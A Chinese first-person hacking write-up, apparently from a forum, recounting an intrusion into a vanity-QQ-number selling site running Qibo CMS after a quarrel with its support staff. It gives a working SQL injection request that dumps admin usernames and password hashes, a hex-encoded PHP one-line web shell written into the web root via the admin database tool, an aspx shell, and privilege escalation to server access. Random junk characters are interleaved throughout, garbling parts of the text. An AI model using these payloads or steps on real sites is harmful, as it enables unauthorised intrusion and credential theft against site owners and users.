9 Y4 ~5 z5 V8 E/ ~
7 q+ r5 w9 Y+ e9 y" l( G % s0 t2 H0 a2 _# E- A6 n$ R- a
. |3 F$ d$ f: [! ?
一、踩点寻找漏洞 / d E! ]# ~- h
闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
) S2 M2 D& m; ~9 w8 t. d- C随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下: * ~4 g, M' N: B, z1 Y' i0 b
先注册一个用户,记住注册时候的邮箱以uid号, 8 m, J2 w* Z3 g" H$ ]- D. B
![3-1.png](https://www.2k8.org/content/uploadfile/202203/17/63eef8f3.png)
! f7 D% [2 j# b; g. `3 j% B* h![3-2.png](https://www.2k8.org/content/uploadfile/202203/17/ca5c196e.png)
# i' a5 m& [& }$ s; P7 [1 P然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
1 ^# m3 C1 x/ Z- j
5 N0 K- ?, u( L- l' @" L$ Ntruename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23 6 ]4 B, @ H* _3 D, C B# o
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图: + b$ L( ?" Q7 ^" V* f( |* ]
![3-3.png](https://www.2k8.org/content/uploadfile/202203/17/dbc48d39.png)
' O: j7 {/ n# h' g1 Z1 D- @2 r: ], Z确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23 - l3 H" s0 C) x, m( k9 C
![3-4.png](https://www.2k8.org/content/uploadfile/202203/17/e9ac2a6f.png) , {+ n; T# w1 b9 J' U9 r/ P# ?
4 a9 ]) P7 ?4 a7 \解密进后台如图:
! D) ^/ {2 X! K- f2 ~3 A5 ^& p. C![3-5.png](https://www.2k8.org/content/uploadfile/202203/17/cce9d32e.png) 4 D k! p# W) y0 g4 a3 l# V
/ r3 N( j( a3 p# m( U; K1 `4 ?- r
$ d% K. c' k2 F R/ r$ l& v* [
二、后台getwebshell
& Z4 R; @6 v: R- k A$ c1 u3 r: n; w进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图: 4 Z5 h1 o; z# i- Q: E1 Y
; S0 I* V' ]! s
![3-6.png](https://www.2k8.org/content/uploadfile/202203/17/7abbb87b.png) ( t& ~& u! y9 x0 c h: ]' G8 y
& T% C* }3 u# Y& O然后点确定,添加提示
7 _; {# D! M1 o$ u. n
* c( t9 V$ h7 y1 ]0 _8 U![3-7.png](https://www.2k8.org/content/uploadfile/202203/17/f87769a4.png) % {7 b3 s. Z1 ~' e7 v
( v+ N2 ^: ~2 J# q
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图: k+ A* N* F$ b; h1 c$ S' d
/ @0 @( m2 U0 \+ w3 e
![3-8.png](https://www.2k8.org/content/uploadfile/202203/17/496065f4.png)
, t; _; E' W* L9 w改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
1 L. H* E' [* U/ M如图:
# |8 R% Y; U1 \" P1 L![3-9.png](https://www.2k8.org/content/uploadfile/202203/17/a4eb98d5.png) 3 s" k3 C: V- j5 q- S
![3-10.png](https://www.2k8.org/content/uploadfile/202203/17/2095fbfe.png) % N' ^' M5 s( X
' T1 k5 r6 p$ g9 g
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开 - Q. ~/ q3 _1 |' t0 u
/ ?5 m8 A% K& d! w o
![3-11.png](https://www.2k8.org/content/uploadfile/202203/17/d1f227e9.png) ' c- w! O g v* w+ d: P) y
3 o/ `$ V" n2 l! U# F) @1 s( F三、提权进服务器 , W/ y) M. d, I4 x1 [0 a* V5 \
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图: $ E3 T) B2 A; [4 k m# _4 G
![3-12.png](https://www.2k8.org/content/uploadfile/202203/17/5dc301ee.png) - r# \$ z6 j2 Q
6 b; n* l8 q: F5 x啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
& i1 o& n: D. G; h" @![3-13.png](https://www.2k8.org/content/uploadfile/202203/17/87b34de8.png) & u0 g9 r5 \; T7 @; p2 T
' d+ e7 T" h. J% e0 u R; H8 J' u; T" T
然后登陆服务器如图: , n: {+ N+ M% q. U$ ^9 E
" p% u4 B' k& [- w4 h
5 s) e8 j8 M6 t9 Y- n \) s
, M! j4 l9 I/ Y% M# X# A8 { L' [1 @
& ]/ G0 x6 g' M3 J/ ]
难怪普通刀连接不上,原来是有狗。 + Y" p+ W+ z. H$ g: \ t
) h: x: K5 r. e* M0 i8 A
7 o- \: x, z6 S4 Z) ]
/ Y, u) x) V: F 7 I- [/ } S. H$ r! {2 X6 p; t
. B7 `3 n* N9 N
: v7 d1 }. |7 d6 n# Y
|